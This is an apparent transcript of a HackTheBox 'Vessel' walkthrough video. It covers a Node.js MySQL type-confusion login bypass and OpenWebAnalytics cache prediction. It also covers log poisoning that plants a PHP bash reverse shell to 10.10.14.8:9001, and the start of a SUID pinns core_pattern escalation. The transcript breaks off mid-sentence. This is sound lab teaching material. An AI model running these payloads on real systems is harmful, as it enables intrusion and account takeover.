What's going on YouTube? This is Ipsec. I'm doing Vessel from HackTheBox, and I really like the concept of this box, especially when it launched, because it had a lot of public software on it that was vulnerable to known CVEs. However, those CVEs didn't have exploit scripts, and further, if you go to the blog post about the CVEs, the authors were intentionally vague and left out some key details. So you really had to go dig into the software, find the vulnerability on your own, recreate it, and exploit the box. If you did this box a little bit after release, when exploit scripts were published to like exploit DB and places, you may have had a much easier experience because all that work was done for you. So when doing this video, I'm going to try to recreate the steps and make this as if it was release day and do the exploitation manually. So let's just jump in. As always, we start with an nmap. So -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it vessel. Then the IP address of 10.10.11.178. This can take some time to run, so I've already ran it. Looking at the results, we can see SSH is open on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Apache HTTPD, also running Ubuntu. And we have a weird header that I've never seen. HTTP train info, and it says problem with XML parsing of /evox/about. So I'm going to copy this URL and let's just test it out. Let's go to 10.10.11.178. We get the page. I'm just going to check /evox/about, and we can see it goes to a 404. So that's not a thing. Let's take a look at the web page. I'm just going to click around to see what we have. Looks like standard links. I'm hovering over the images, and I see it's going to direct images. So we see like /thumbnail/6.jpg. I'm just going to try to see like 7.jpg to see if it exists. We get a 404. Does this have like open directory listing? So if I just go to /thumbnails, it also, interesting enough, goes to 404. Portfolio. So it looks like directory listing is disabled on this server. Let's go beyond that. If I saw this was not getting it through JPEGs, let's say if it was like a parameter, then laptop dot, or like it was doing through parameters, I test for things like SQL injection and things like that. But doesn't look like there's a parameter there, so I'm going to ignore it. The only thing interesting on this page looks like it is login. But we spent enough time just manually looking at this. Before we waste any more time, I'm going to start up a gobuster. So gobuster dir for dir mode -u http 10.10.11.178. The word list we use is opt sec list discovery, web content, and raft-small-words.txt. And then the output file, I'll just call it root.gobuster. And it doesn't start. It looks like the server returned a 302 message for this URL. So I'm guessing all 404s get redirected first, which is a bit weird. Let's just confirm our suspicion. So intercept is on there. I'm going to turn intercept on here. And we're going to go to the URL, send it over to repeater, and forward. And we can see this domain definitely does not exist. And it forwards us to 404, which goes here. So that's what gobuster is complaining about here. So what we have to do is turn the negative status code to 404, or to 302. So let's run this again. And I'm going to do a -h because I don't know that flag. It's probably like -n or -b for a blacklist string. That makes sense. So I can do a 404 and then 302. And now when we run this, it looks like it works. I'm going to specify threads 100 just to speed it up because this is going to take a while. And before we move on too far, I want to go over all the results of gobuster because there's something I missed when doing this box initially that when I came back, it would have made my life so much easier if I just caught this one small thing. So let's let this gobuster finish and go over the results. Okay, so now that gobuster is finished, the two things that stick out most obviously is the /dev endpoint and /register. The dev is going to be a folder, and it redirects us to dev with a trailing slash. If we try to navigate to that, let's go to Burp Suite, send it into repeater, and we can see dev goes to dev with a trailing slash so we can follow the redirection, and it redirects us somewhere else to go to a 404. And now this is a little bit of odd behavior because I guess we don't have access to this folder. But if we go to the register endpoint that it also showed us, and we just register an account, so ipsec root@ipsec.rocks, password of password, and we want to intercept this. Let's turn intercept on. Okay, register. We're making a post request to API/register, which is odd because API did not show up on a gobuster. And the reason for that is, I don't know exactly why in the code, but maybe this is just a normal Go thing, that the folder isn't working as intended, right? Or as we would expect. It's probably working as intended, but if we do a get on/API based upon what I said about dev, you may be thinking, hey, API is going to redirect you to API with the slash, and then if it doesn't have content, then it's going to 404 you, right? But no, API just goes straight to a 404 page, which is a little bit odd. But if we thought about that as we are about to do the next step and try to figure out what is inside of dev, so I'm going to do 10.10.11.178 dev, and this raft-small-words, we can do lowercase. So now it should go really quickly. Maybe not as quick as we expect. But this gobuster, I don't expect to return anything because I've ran it once before. The issue is there is a directory here in this dev folder that exists, but you have to go 2 levels deep. And if you thought about the behavior with the API, you may know to do that. But if you didn't, you kind of get screwed here. That being said, this whole step is one of those optional steps. You can do this box without finding the next folder here, but it does involve a little bit more guesswork or just experience testing Node.js applications because it's going to be a type confusion-like vulnerability. But we can see gobuster didn't finish anything. It finished, but didn't find anything. If we switch to a word list, let's say common, this is another good one. And we can see right off the bat, it discovers .git/head, right? And if I browse here, let's turn Burp Suite off real quick. Do .git/head. It probably wants capital, so .git/head in all caps. Oh, we need to go in the dev. Dev.git/head. There we go. We can get the file there, right? So that file does exist, but if we get dev, redirects is here. If we do .git, both of these are 404s. We specify head, and we get the file, right? So now that we know there's a Git repository inside of dev, we can extract the source with a tool called like Git-Dumper. So Git-Dumper HTTP 10.10.11.178 dev.git, I'm going to say drop that in the source directory. And it's testing it. Oh, 10.10.11.178. Typo there. Let's do 178. There we go. So now it is downloading the Git repository for us, and we can get a copy of all the source code. If we do code to open up Visual Studio Code, we can look at the source code, and I guess routes is probably where I want to go to see everything. And looking at this, we have a route.post for API register and API reset, API login. And this code is actually going to be vulnerable. You wouldn't think so because this looks like a prepare to parameterize statement, but Node.js is doing something really silly and allowing us to pass objects here. And that may not be just a Node.js thing. I want to say most libraries that do parameterize statements will enforce some type of type checking when going into this, right? Because this is a string. We should only be able to insert like string or things that can be defined as a string, like an integer or something, right? Into this statement. Or null. Like it should be probably string int null that can be passed into this. But if we give it an object, we change this query dramatically, which we'll get into in a minute. I just want to see if there's anything /dev. I don't see a route on dev. So I don't know exactly how that works. So let's just jump into the whole type confusion thing. And how you're supposed to find it is you see this comment that says MySQLJS MySQL library. And if we just Google MySQL JS SQL injection, this is the top post, and it goes over pretty much what we're about to talk, but I'm just going to explain a lot through demos because I find that easier. And we can see almost verbatim, like the code between the server and here, right? So all it does is assigns request body username and password to the variables, make sure they both exist, does a select query, makes it look like a parameterized statement, which maybe it is, but it's not doing type checking. So let's go to the login function. So if I go login, and I'm going to do admin, the password of password, let's intercept this. And then go over to Burp Suite, proxy. We don't need that request. This is the one we want, API login. It redirects us to /login. We could test for like, or 1 = 1 like this. We probably have to HTML encode it. And none of this works. It's not injectable this way because it is a parameterized statement. That being said, one of the typical NoSQL things is, or SQL injections in Node.js is through NoSQL. And it's a type confusion vulnerability like this, where you do NE for not equals to. So this would be changing the query from, let's go back to code. Let's see, can I do plus to make this bigger? Awesome. So it would be changing this query. Let's just copy this to look something like, is that the comment there? Let's just take this select statement and go into Vim. That sounds like the more easy thing to do. Vim test. So here's the query. What that's doing is essentially saying and password not equal to junk. So that's what it changes our query to. MySQL doesn't have this NE parameter, so it's not vulnerable through NoSQL injection. However, the key thing is we actually crashed the web server by doing this, right? If I run this, we get a 502 proxy error, and now when we request the website, we get service unavailable for like 10 seconds. So what's happening here is Apache's a reverse proxy to NPM or whatever the Node web server is. So we send this request to Apache. Apache then sends it to Node on our behalf, and we crash the node, and that's why Apache returns with this error. But because we crashed it, we know something odd happened here, right? Before you get RCE, most times you get a crash. So we know it wasn't vulnerable to a NoSQL thing, but if we change it to a MySQL thing, we get this returned, and it didn't crash here. If we put something that didn't exist here, we crash the web app. So I'll explain that in a minute, but if we do password and then like password is equal to 1, it's going to redirect us to admin. We just bypass the login. And this, how we define this, makes more sense if we look at it in JSON. So I'm going to type this real quick in JSON to show it also works. And this is how you normally do Node.js things, because almost any endpoint in Node.js that you can hit via URL encoded data, you can hit via JSON. And sometimes the web server, I think Nginx will just not pass this by default. So this is not a reliable way to do it. The most reliable way is what I'm showing you here. So this is what we did, right? And the key thing, I did change that to JSON. So we passed the password as an object. So what that changed our query to is it actually did and password is equal to password and is equal to 1. And you may think this is not valid SQL query. It is. You can do multiple equal signs. So this is getting the value of password, saying if it's equal to the value of password, and this 1 is being treated as true or false. 1 is true. And we can validate that also by passing in true instead of 1. and that works. So the key piece of information is this has to be a column, right? So if I did please subscribe here, this is when we crash the web server. However, I'm guessing it's either user or username is the name of a column. I'm going to go with username first because that's the parameter name, right? So we did password, username, true. And we get directed to login. Now that kind of makes sense, right? Because what we did is we changed this to be username is equal to 1. 1 is true. Password is not equal to username. So if we change this to false, then it's going to let us log in. And we get in. So this is just a somewhat common vulnerability in a lot of Node.js apps. The blog post here talked about it. One of the more humorous things, if you go to the GitHub, so if I search for MySQL Node.js, let's go here. MySQL Node.js. Shoot. We go to the npm repository, and we can see I've never seen MySQL in Node.js, but there's 1.2 million weekly downloads, so it's used somewhere. If we go to the GitHub repository, we can see the last commit was over a year ago, and this version is still vulnerable to it. If we go into issues, type injection, I want to say this is actually the first issue opened in this library related to this. I'm not sure because this person was just running Acunetics, which is a web vulnerability scanner, and the application crashed because it had an unknown column Acunetics. I can only guess what happened here is Acunetics did this and then crashed the web server, and in the logs, it crashed because MySQL couldn't find the column Acunetics. Because these two, when we refer to them this way, are column names, right? So it was looking for the column Acunetics and said, hey, password can't equal that because this value doesn't exist. I'm going to crash. So that's where I think this all started from. And there's a lot of back and forth. It ends with like, there's going to be some changes in Node that make a lot of this able to shoot yourself in the foot thing, not an issue. And then eventually it gets to a locked thing. But I want to say this vulnerability has been known and around since like 2014, just never fixed for whatever reason. There is documentation on how to do it. So developers should, I guess some people in there were saying like developers should look at the thing and say, hey, I should do strict type checking. So to harden it, I could do string username, string password. And that may just be a safe thing to do whenever you're coding an application in Node.js is always declare what type you're passing when you're dealing with unknown data types, which come from the user, right? Because this now would not be vulnerable, but it's enough of that. Let's go log into the application. So let's intercept this request. Go to proxy. Am I intercepting right now? I am. So I can just do password 1. And then we send it. And we get logged into the admin dashboard. So if we click around here, there's not really that much in here other than a link to this analytics page, which brings us to openwebanalytics.vessel.htb. So let's add this to our host file so we can browse there. So I'm going to do vim etc host, make sure we run this in sudo, and then we can do 10.10.11.178, put in openwebanalytics.vessel.htb, save that, refresh. Burp Suite probably has a DNS cache thing going on, so let's just disable that, go back to the page, and we get to this login page. We never got the admin's password, so we can't just log in. And this is going to be a PHP application. It is open source. It's an open source version of like Google Analytics, so you can host it yourself. And it's saying it's version 1.7.3. Now, if we went to exploit DB, we could just type OpenWebAnalytics and get an exploit right away. I want to say OpenWeb 1.7.3, but this was created after the box was released. So we're not going to cheat and use this. The intended way of the box was to read the exploit write-up, which I think was the only thing available at the time, and piece it together because the exploit write-up was written in a way that made it very vague. So I'm just going to Google OpenWebAnalytics 1.7.3 exploit and see if we can find it real quick. So that's exploit DB, packet security. Here's the blog post that initially talked about this vulnerability. And the first piece goes into, let's see if I can find it. When you're trying to log in, it's creating a cache of something.php here. So if I went to the login and did this login admin, according to the write-up, I just went away from it. There should be a directory OWA web, OWA data, caches, one OWA user. So if we go back and go here, first let's see if directory traversal is enabled, right? So if I go OWA web, not found. Let's do OWA data. Anything? So we get the page. I swear this directory exists. I'm just going to go to burp suite so I can see this easier. Burp suite, intercept on, send it, 404 not found. So let's get rid of this directory. Okay, this one existed. So I probably did something like I killed an extra character probably. So we do this, OWA data. Let's see, we get a blank page, so we can go to caches. And then one OWA user, and this is not a open index. So what the write-up is saying is this is brute forceable, or we can have a way to calculate this. It doesn't exactly tell us how, because I guess they're trying to prevent just bad users from taking this right up and immediately exploiting things. But they say it is calculating it, right? We can see after calculating the file name, we can easily retrieve the cache file, but it just doesn't say how to. So for that, we have to go to the source code of the application and figure it out ourselves. And once we do, we get a serialized object that has some data that we can use to reset the password. So I'm going to go to OpenWebAnalytics, GitHub, go to Google, and then we're going to download version 1.7.3 because unlike the last piece, the latest version of this is patched, right? So I think I clicked on the thing instead of 19 releases. Let's see, 174, 175. Yeah, 174 has a critical security exploit, and it fixes an exploit where it's possible to predetermine caches. So let's go to assets. We can download the tar, save it, and let's go back to a box, make dir, let's do OWA, move, downloads, OWA package, that's fine, XVF. So now we have extracted it. So let's remove the tar, and we can open this up in Visual Studio Code. And it's not easy to find where this actual exploit is because it's going to be dealing with a lot of like PHP deserialization and things like that. I'm guessing the author stood this up on their own and did some type of dynamic debugging to figure this out, or just looked at the output file and brute forced the MD5 sum, because through static analysis, this is a pain, but it's the way that I did it. So if we look at their blog post, we can see they make reference to something. Where is it? It is the PHP files. I think OWA file cache is where we start. So if we look at OWA file cache, I'm just going to do edit, find in files, OWA file cache. We can see it's going to start creating PHP files. We got the file header and the file footer. This also tells us there's a put item to cache store functionality, which we could find ourselves. I like going into outline and just searching it this way. We can see if we're writing files, put item to cache store sounds logical, right? So we're going to put item to cache store. And what we can see is, let's see, it's going to, let's see, where is it? We open, this is where it writes it to disk. I believe we got temp cache file right here. So on this rename function, it writes it to this file, cache file. And cache file is defined up here as collection.dir id.php. And in PHP, period is concatenate. It's going to combine these two strings. Collection.dir is just going to be the cache directory that we know. We don't know what ID is. And this is the field that is really painful to find out, right? We can see it's put in the call stack of put item to cache store. So let's look at where this thing is called. I'm going to find in files, put item. I know you could also right click, find references and do it this way. For some reason, I like it this way. But we can see these three are definitions. This is the only time it's actually called. And it's called in, let's see, OWA cache, persist cache. So we could look at where persist cache is called. And it's only in the destruct. And this may sound weird, but it makes sense if you think about it, because when the user object is destroyed out of the script, it wants to cache it or write it to disk in order to save it. And the whole functionality of that is so it doesn't have to make extra database calls, because retrieving a file off the disk is much less CPU intensive or network intensive than it is making a database query. So that makes sense. So it's going to write all the dirty objects into the cache store, but we don't know what a dirty object is. So let's see at where it's defined in this. So let's just search it. We can see it's an array here. So it's defined in this set command. And also in set is where it's going to do hash. And if we look up the definition of hash, let's see, is it implementation? It's just MD5, right? So the reason they did this instead of just calling MD5 all the time is, I'm guessing if they ever wanted to change the hashing algorithm, they just change it in one place and it's done everywhere, right? So let's go back and look at dirty objects. So dirty objects is called in set. So we want to figure out where set is called. So I'm just going to look at it, and that's a lot. Set like that. And there's a lot of things. One stands out right here because we're in the OWA entity file, and it's cache set. It stands out because it's cache to me, right? And we can see it's in this add to cache. And again, we're not getting any column names here to know exactly what we want. So actually, we get the column name here. What I meant to say is we need to look at what calls add to cache, because this is just a function. So we can see it's called a few times. We could, because we know the default is ID, we could just try to MD5 ID and try it that way. So let's do echo ID 1 and then MD5 sum. And we also have to do a -n to get rid of the line break. And if this works, then we will be able to do this .php. And we get file not found. And just in case the cache is gone, I'm going to try logging in again. And it should have written to the cache and do it, and we get not found. So this does not look like it is the file. This is the only argument of add to cache that's doing a custom column. So that's why I'm going to focus on this one. And we can see this function is get by column. So somewhere in get by column, it's going to cache it. So let's look at where this is called. And it's called in a lot of places. However, we're dealing with an authentication thing, because once we attempt to authenticate, it's writing the user object to disk. So it's going to be one of these and probably OWA auth, either temp passkey, email address, or user ID. User ID makes the most sense to me, so that's one I'm going to try. So we're going to try user underscore ID1 MD5 sum, and we're going to grab it and write it. And we get a blank thing, not a 404. If we look at the source code, we have it. So what I'm going to do is just curl this to write it to disk. The reason we don't see anything here is just it's web browsers hiding everything in brackets, right? So we're going to call this cache.php, I guess. I'm going to do it up one directory. I'm going to write it. So now if I look at cache.php, we have a big string. So I'm just going to read it, get rid of the PHP tags so we can base64 decode it. There we go. And then base64-d, cache.php, and we have it decoded. Now this is a big, ugly object. So we could do two things. We can either like do a sed to replace semicolons with line breaks, and that kind of makes it easy. Or we could write this to PHP and do a pretty print or something, right? So that's what I'm going to try real quick. So copy this. Looks like everything's in double quotes. I'm going to get into a PHP interpreter and then say x is equal to unserialize and paste in that ugly object. And I didn't get an error message. So if I just do echo x, what happens? It can't just print this. I bet var dump will work. And there we go. We have a somewhat pretty way to display this. We have an API key here. We also have, let's see, there's going to be a password somewhere. Hope it sticks out. Temp passkey. This is what the blog post references that we'll be using in a second. But you get the whole user object. And here is the password. And it turns out this isn't crackable, so I'm not going to bother wasting time trying to crack it. But if I was doing this live, I would. So the blog post references with the temp passkey. Let's see, temp pass. With this key, we're able to reset the password. So let's go here and search temp passkey, gets the variable, and it says we can do it via the base user change password function. So let's go to that. I'm going to click, if we copy link to the reset password, we can see it's going index OWA or index.php, OWA do, base.password reset. So I'm going to change it to, what was it? Is in the blog post, user change password. So we just want to go to this form, and this is where we'd enter a new password. So I'm going to do password is equal to password, and then we're going to intercept this request, make sure we're intercepting, save new. And what we want to do is put the temporary password where OWAK is. So let's go back to our terminal, copy this, put the key there, and did it reset? Can't find temporary key in database. So I'm guessing it had changed since we did it. So I'm going to try this one more time. I'm going to do admin junk, and then we're going to curl to write, get rid of going up one directory, edit cache.php. I should probably just do like a search and replace at this point to do it quicker. But base64-d cache.php, we'll do less so we can easily search. Temp pass, and this is the temp pass key. The value is right here. So let's try changing the password again. Where is it? Index. We don't want base login. user change password, password, password. Let's see, intercept on, save new, put this in. It looks like I got the same exact, oh no, there we go, success. Please log in with the new password. So that time it recognized it. We can log in with admin and password, and we get logged into OWA, the OpenWebAnalytics. I feel a little bit dirty whenever I say that because I think of OWA as like Outlook web application or whatever that stands for. But I click on Vessel and it just took a little bit to load. I thought my burp was intercepting it. And we can get here. If we looked at the vulnerability, the next one talks about going into the settings tab. And we can do essentially log poisoning to this. So if we go to settings, there's going to be two things we have to be able to do. The first one is a mass assignment vulnerability. I'm going to see if I can find quickly where it talks about the two variables. Let's see. I want to say file path is one, or log file path. Let's see, error level. Okay, so we have to set the base error level to 2, and that will give it more debug information in the logs. And then there's a log file path as well that we have to set to change the logs. So if we went here, by default, the logs are, where is it? Right here. So this is where the log is stored out of default. If I go here, let's see, let's do it on this tab. We can search, paste, OWA. Oh, we don't have this OWA directory. OWA data logs. We don't have any logs, but once we change the log level, then we will have logs. So let's do that real quick. I'm going to make sure this is in Burp Suite, turn intercept on, update the configuration. And if we look at where log level is, let's just do a search. Log, let's see, is there a level? We probably have to add that. That's where this mass assignment vulnerability comes into play. So let's just add the variable base log level. And this is how a lot of configs actually work. They don't actually have anything coded like for every single entry here. Instead, what they do is just do PHP input and loop over these entries. So it sees this entry and it has some type of logic how to write to it in the log. So what I'm going to do is just and we'll do OWA config, and we'll copy this entire thing, base error log level, and change it equal to 2. Okay. I think that now sets it to 2. We can forward it, refresh, and let's see. If I refresh here, we have errors.txt, and we have the log. The issue is the log is going to be text, so it doesn't get executed. Anything we put here won't. Like we can do PHP system, then bash-c. I want to do it in, we'll do it this way. Bash-i, dev tcp, 10.10.14.8, 9001, and that. I'm just going to copy that so I have it for later. Update configuration, and we refresh the error logs. We can see the PHP tag did get written here. But again, the issue is going to be the file name. Do we have file name anywhere here? We do not. Let's see. Base error log level. File name. Name. I wonder if they left this piece out of the write-up. It looks like they did. Let's just search underscore name maybe. So I'm going to go back to this, and it was what? Error log level. And we have error PHP. Does this give it to us? Error log. Not there. see, I wonder if I search this, is there anything? Error log file right here. So I bet if we change this, we'll be able to get to a different file. So let's go back here. And I'm going to put my PHP back in. And we're going to change the error log level and everything all at once. So I'm going to intercept, update, and I'll copy. We'll make it easy to un-URL encode it. And we're going to put 2 of these. Error log level, error log name. So I'm doing this again just in case the error log level, it decides to revert that parameter. So now we have both of those. Let us URL encode this, send it. I hope that works. Forward. Settings saved. We probably should NCLVNP 9001. Refresh. Errors.txt is not found. Is a good sign, but we don't have anything here. So let's update config. Errors.txt. I'm going to be annoyed if it reverted itself. Let's see. Intercept. Let's do it without updating the syntax or the encoding. So that's resolve host. This is error log name shell.php. I think get rid of that. I screwed that up. Let's see. Copy, paste, paste. This will be shell.php. Error log name. And this is 2. Error log level. Those are the ones, right? Error log file. Error log file, not name. Okay. Send. Refresh this. It's still errors.txt. I wonder if error log file is the path. OWA data directory. Error log file. I wonder if I put the full path. Let's try that. Let's just, instead of giving it a directory, we'll put the full path there. So go back. Here, PHP. Error log file. I'm going to put it here, direct. Is that actually going to be the directory parameter or file? Search this. Error log. I just forwarded it. Do this again. Update. Paste. Paste. So let's give it the full path. Var www HTML. I'll just copy it from here, actually. Shell.php. Okay. That's set. This is error log name file. I don't know why I keep reversing those. 2 and error log level. Let me make sure it's error log level. Yep, level here. Forward, okay. We go back. Let's look at this directory. We have shell.php. We didn't put a PHP code in yet, so it's not going to send it to us. Let's now update the config to do that. I am listening. Refresh shell.php. And we had something, but it stopped. So let us go back. I forgot to do 0 at and 1 like this. Update, refresh. Let's see, we can probably do a KP. And there we go. I did the KP because I wanted to keep it open. The reason why is I had a bad connection first. Let me clear the screen. It'll make it a bit more obvious. So I had bad code first that didn't keep my shell active because I forgot the directing 0 at and 1. So right after that finished, it would send another connection back. So by doing the K, it would keep it open. I could have intercepted it and replaced error log file with a different thing, but at that point, I made so many mistakes. I just want to take the easy way out and get that way. So let's get a shell. So import pty, pty.spawn, bin bash. I screwed that up. Import pty, pty.spawn, bin bash. There we go. sty raw minus echo, foreground. Export term is equal to xterm. Let's do stty-a and 31121. Export term, xterm, sty rows, 31, calls 121. So now we have a proper TTY to this box. If we go to var-dub-dub-dub HTML, we can like get the database password if we wanted to. So let's go OWA. Then it's probably going to be OWA config.php. Let's just grep it for DB underscore because that's standard naming convention in PHP. Probably other things as well. And we have localhost OWA user MySQL. So we could do MySQL-u OWA user. We'd specify password and put this password in. Show tables, show databases, use OWA. And we could select star from users, show tables, which one has users, select star from OWA user. And we could dump the database. There's only the admin user. We had this hash before and I said, I don't know how to decrypt it. So nothing we can really get from this database. So let's go to /home and we can see there's two users. One is chmodded to, I'm guessing this is 775, is Steven. So we can go in there. And there is a file called password generator. And there's also a directory notes that we can go into. So if I do file password generator, I did files. If we do file, we can see it's a PE32 executable. So it's going to be something Windows. We do strings against this. Let's see, is there any strings we recognize out of the bat? If there's hard-coded passwords or anything. Doesn't look like it. Here's some actual strings. We see a bunch of Python stuff. So this is going to be a Python compiled executable. So we probably want to just download everything here. I'm going to do the lazy thing and start up a web server. Let's do Python 3-m80 HTTP server. And now I can just do wget-r 10, 10, 11, 178, 8001 and download everything. So that was just a recursive thing. Did I download? Did it go in that folder? Let's see. Go in here, index.html. If I go into notes, .notes, we do have 2 notes here. So let's go in here. If I do open screenshot, we can see a picture that says secure password generator. It's got a length of 32, all characters. The password is hidden. So if I just open notes.pdf, we get a password thing. So I'm going to guess this PDF document is encrypted with a password from this password manager. So what we're going to have to do is decompile this, figure out how it generates passwords, and see if there's any way we can create this exact password. If we do stat against screenshot, let's see. The file was probably created a couple months ago. Is that right? cd.note. Actually, that's 2022. So this is when the file was created. If it's doing anything based upon like time and setting the seed that way, having this would be key because we know when the screenshot was created. We could just walk all the seconds for like the last hour before the screenshot and potentially find a collision that way. However, let's just go and start analyzing the file. So I'm going to try uncompile. Do I have it? I do not have it. But that doesn't matter because we need to run Pyinsxtractor first, since this is an executable. And we know it's an executable just because it says PE32 here. So I'm just going to move it to .exe so it makes more sense to me. And then we're going to get a Pyinsxtractor. So Pyinsxtractor, see if there's a thing on GitHub. We can probably just clone this. So git clone. Then go in Pyinsxtractor, Python 3. And then, what was it? Password generator.exe. Okay, so we have it extracted. And it says it's running in Python 3.7 because it just extracted the PyC files. So if we do ls grep PyC, we have these. And this is going to be eventually the source code of the application. But our Python version is 3.9. So I'm going to use Docker to get Python 3.7 and then run that. Because if you've ever done anything Python related, changing the library on your computer, it always creates a mess, or at least for me. So I'm going to Google Docker Python 3.7. We can go here to the official page and then search for 3.7. And we got 3716. That, I guess, will probably be fine. What did Pyinsxtractor say, actually? Python. Let's see. Doesn't give a subversion, just says 3.7. So I'm guessing this will be fine. Oh, we have just 3.7 here. I'll use this. And then I'm going to copy this. V Python 3.7.docker. I'll do 307. Paste it. And sudo docker build. Let's make our own directory. Py307 move star.docker here. Sudo docker build dot. See, unable to evaluate symlinks. It wants just Docker file. So move Docker file. There we go. So now it's starting to build the Python 3.7 image. And from here, hopefully we'll be able to start it and get uncompile working. So it's still extracting. Come on. The last one always takes the longest. Oh, it's going to build. So I'm going to pause the video. We're going to let this finish building and then resume. Okay, it is now built. So if I do sudo docker images, I can see all the Docker images. I'm going to guess the one built 2 minutes ago is this one. I didn't give it a name or anything, so it says none. But we can test this out with a sudo docker. It's either run or exec. I think run-it for interactive, and then sh. Sweet, we're in a shell. So if I do Python 3, it is 3.7. So what we want to do is get pip. If we don't have pip, let's do which pip. We do. And I think we can do pip install uncompyle. Let's see if there is one. Looks like it does install. So the next thing we need to do is copy the file here. If we were smart, we would have like mounted this Docker image to a current folder, but I didn't think that far ahead. So let's just copy the files we want in here. So I'm going to start with, let's see. I wonder if we can just do a star.pyc. So sudo docker ps. This one is running. So sudo docker cp, the container ID, and then the location we want. I'm going to do mount, I guess. I'm going to do star.pyc. Exactly 2 arguments. And I gave it many. So it doesn't look like it gave it many, but how the star works, it does multiple arguments. I'll just do the password generator.pyc. Cannot copy directory. Oh, the wrong way. This is what I want. There we go. So now we're copying that file into /mount. If I look at /mount, we have it. So I'm going to do uncompile. First, I'm going to go into bash so I have tab autocomplete. Uncompile 6, password generator.pyc. And I can just do this to password generator.py. There we go. And now let's just reverse it. So, whoops. Get rid of this. /password generator.py here. And if I look at the file, we have a copy. So let's look for where it actually generates the password. Looks like I found it, gen password. And looking at this, we have the char set, the length. So this was probably set via the GUI. I don't have the screenshot open, but the length was, I want to say 32. We can double check that once we create an exploit script. We have char set right here. I think it was all characters, so I'm guessing this is going to be it. And then it just does this try to assemble the password. So let's go and put this in less so we can easily copy it. I'm sure I can copy in Vim, but I just always have trouble, and this is my workaround. So I'm going to copy this entire thing. Copy. And let's see, I'll just create a new window, v gen passwords.py. Paste this in. And let's go back, unindent twice. There we go. So I'm going to say the length was 32. You can do this as the char set. And then what the vulnerability is this QS rand. Because this is essentially the seed. And since it's generating the seed just based upon the millisecond, there's only going to be around 1,000 potential things that it can be, 0 to 999, because those are all the milliseconds, right? So we can do for I in range 0, 999. And then the QSRAND function, password, length range, len char set, password is equal to this. And then we can print password like this. Okay, I think that is pretty much it. We need some import statements. So let's look at this. It's just importing, let's see, Qt core GUI. I'm going to guess we want Qt core. I'm guessing that's where the QSRAND comes from. So let's see if we execute this. we get 32 or we get 1,000 passwords. So potential passwords. Let's cat that real quick. Awesome. What other thing was I going to do? Oh, before we do anything, let's go back to the notes that we downloaded. Do an open, screenshot, 32 length, all characters. So I think I now have the potential password that is there. So let's now do I think PDF to John. Do I have it on this? Locate PDF to John. There it is. And this will generate a password hash for the notes.pdf, which will eventually let us to crack this, right? So v hash, paste it in. And let's scp potential passwords and hash to my cracking box that I call the Kraken and go in there. So ssh Kraken. And I don't know if Hashcat can actually do this. I'm going to use John. So let's see. I'm going to cd into op John. And then we want to just execute John with the word list. And it was root potential passwords. And I want to say the file I just called hash, right? Yeah. And let's just cat root hash to make sure that's notes.pdf. It is. And it doesn't crack. It runs almost instantly, but we don't get anything. Now, the issue could be the whole like random library differs based upon OS, and Linux and Windows is pretty radically different. So let's copy this gen passwords over to a Windows machine, run it again, and see if we get a different password list. Okay, I am now on my Windows box. I'm going to go to a web server I had stood up, and we're going to get the gen passwords file. And we're going to save this to just a text file. So we can do new text file. I'll name this gen password.py. I guess I could have saved it, right? Oh well. Let's just edit with Notepad, save, and we have the file. I'm going to run Python. Let's see, Python 3.9. Shoot. Let's find out where that is. Open file location, properties, C:\Python 3.9. So cd / Python 3.9. Was it 3.9? There we go. So now I can run python.exe desktop. Oh, is that not there? / users ipsec desktop. Let's just see if this works. Tab autocomplete is not. Gen password.py. No module found named pyside2. So pip install pyside2. And we're going to install this. Hopefully it doesn't take too long. Gonna see after it downloads if I need to pause the video. I probably will. Yep. So I'm just gonna pause it, let this finish installing, and then we're going to, well, run it right now. And we have a bunch of files. So I'm gonna output this to a file. So let's do this and passwords.txt. There we go. We should have a file on a desktop called passwords.txt. There it is. So let's copy this over to our Linux machine. Here we are. I'm just going to v passwords.txt, paste this in, and then let's diff passwords.txt and potential passwords. And we have a lot of different potential things. So let's just scp passwords.txt to Kraken. Let's see, ssh back in, cd op John, and let's run this again with passwords.txt. And there we go. It is now cracked. We can see this is going to be the valid password, I think. It says run it with -- show, so let's do that real quick, just in case. YG. So that was not the password. So I'm glad I did that. So we can copy this. And then let's go 10 notes, open notes.pdf, put in that password. And here we go. We have now opened it up and we have Dear Steven, I'm going on vacation. Here's my password and it's Ethan. So let's make sure we copy that correctly. SH Ethan at 10.10.11.178. Put in the password we just copied and we get logged into Vessel. So normally here I would run linps, but I'm getting a bit strapped for time. So we're going to take a shortcut and just use the find command to list all SetUID binaries because the path is going to be finding a SetUID binary. So I'm going to do find /-perm minus 4000 ls and pipe errors to dev null. And we can see there is a binary called pins, and this is unique. I've never heard of this binary before, so whenever I see a binary, one of the first things to do, especially for SetUID, is Google the binary name and then exploit. And we come to this create escape article from CrowdStrike. And this binary is going to turn out to be able to set kernel parameters. If you can read the whole thing, it mainly maps to Kubernetes. So we're going to have to find a way to exploit this without using Kubernetes because Kubernetes is not installed in this box. But essentially, it allows us to set this parameter kernel.shm.rmid or shm_rmid_forced. But it also has like an injection vulnerability, so we can set the core pattern. And what this will do is execute a script whenever a core dump is performed, right? So we can set the parameter and then set the core dump to execute a script and kill any program and it'll execute our file, right? So that's what this is going to be. One of the main issues with this is the pins binary itself doesn't have a help page. So we have to go look at the source code. So if I GitHub pins, I want to say CRI-O is the software. Yep, right here. Go to the GitHub page. Let's go into, where is it? Source. Pins. I see pins here. And then source and pins.c. And this is going to tell us where all the help is. We can see there is an argument for help, but if we look for it, so let's do case H, we see the usage is commented out. They never really created a usage thing. So we can do, let's see, how do we want to do this? What arguments are there? Optional parameter, sysctl. So this is what we're using is sysctl to change the parameters. And we want to create one like this. So we can do pins -s, put this in, and we'll say equals to 1 plus, and then our exploit, right? So we'll do this. And let's do dev sh, we'll do temp actually. Temp, and we'll call this exploit.sh. So if we run this, we need to do 2 ends. We get an error message saying path for pinning namespace is not specified. We could also beforehand check the kernel parameter. I think it's cat / is it procsys? Then kernel shm rmid forced, and we see it set to 1. We can also look for, what is it, kernel, then core pattern, because this is going to be where actual exploit is. And we see it's set to something weird, right? We want to change it actually to pipe temp exploit. I want to say apport is like the, let's see, the error reporting thing for Ubuntu. Like it's creating some type of report and sends it off to Canonical or something maybe. But we have to figure out this error message, path for pinning namespaces. So I'm going to go back into Google, and not Google, GitHub, and we search, and we have, if pin path does not exist, it's going to exit saying that. So we want to see what pin path is. So let's see. Search for pin path underscore path. And let's go up instead of down. And we see it set by the D argument. So I'm going to 